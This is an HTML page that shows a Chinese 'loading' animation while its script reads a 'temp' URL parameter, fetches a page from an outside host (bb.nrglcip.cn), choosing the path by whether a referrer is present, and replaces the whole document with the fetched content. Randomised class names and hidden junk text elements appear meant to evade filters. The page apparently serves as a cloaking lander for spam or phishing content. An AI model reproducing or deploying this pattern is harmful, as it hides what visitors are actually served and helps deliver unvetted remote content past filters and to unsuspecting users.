<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .N0IXsD5J7Fi {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .N0IXsD5J7Fi .cky9Oju84h {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .N0IXsD5J7Fi .content {
            line-height: 50px;
            text-align: center
        }

        .N0IXsD5J7Fi .img {
            width: 100%
        }

        .N0IXsD5J7Fi .IgR3di {
            text-align: center
        }

        .N0IXsD5J7Fi .IgR3di span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .N0IXsD5J7Fi .IgR3di span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .N0IXsD5J7Fi .IgR3di span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .N0IXsD5J7Fi .IgR3di span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .N0IXsD5J7Fi .IgR3di span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .N0IXsD5J7Fi .IgR3di span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .N0IXsD5J7Fi .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function DTDBAraYC(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gHGyBY = DTDBAraYC('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gHGyBY +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gHGyBY +".html?a=share";
		}
		
        CNUFVC9k=url+"#"+new Date().getTime();
        CNUFVC9k && function() {
            $.get(CNUFVC9k, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>KSTtfQQcKHmKFWZ2UMGZYeJFESudwqav5V4GwejWcedKZ</div>
<b style='display:none' >AK31kY9v8HbYuuq8A7wDOMgOyhq</b>
<h1 style='display:none' >Z8avD8OxDjKg6tfLmdsRJFsyLnvTaAouPxA4eX0Jk6KlvggRwptgslMWd9yFVUvCWbI1aYfy</h1>
<li style='display:none' >v2irc9bDe1uMQf2h6uScM56d0gdS1k8ZkABJFc42FaqV5lhi7e2BpYwmN2ZWiiMX5gzZOyLF1qukeBfosmYooTmUvl7u</li><div class="N0IXsD5J7Fi">
    <div class="cky9Oju84h">
        <div class="IgR3di">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >muBEEHOiDdvh1geyEC8IniL7uQi1TVz9Za</li>
<li style='display:none' >muBEEHOiDdvh1geyEC8IniL7uQi1TVz9Za</li>
<img  src='' style='display:none'>
<ul style='display:none' >Z8hB4yQyT2kWsuSWf</ul></body>
</html>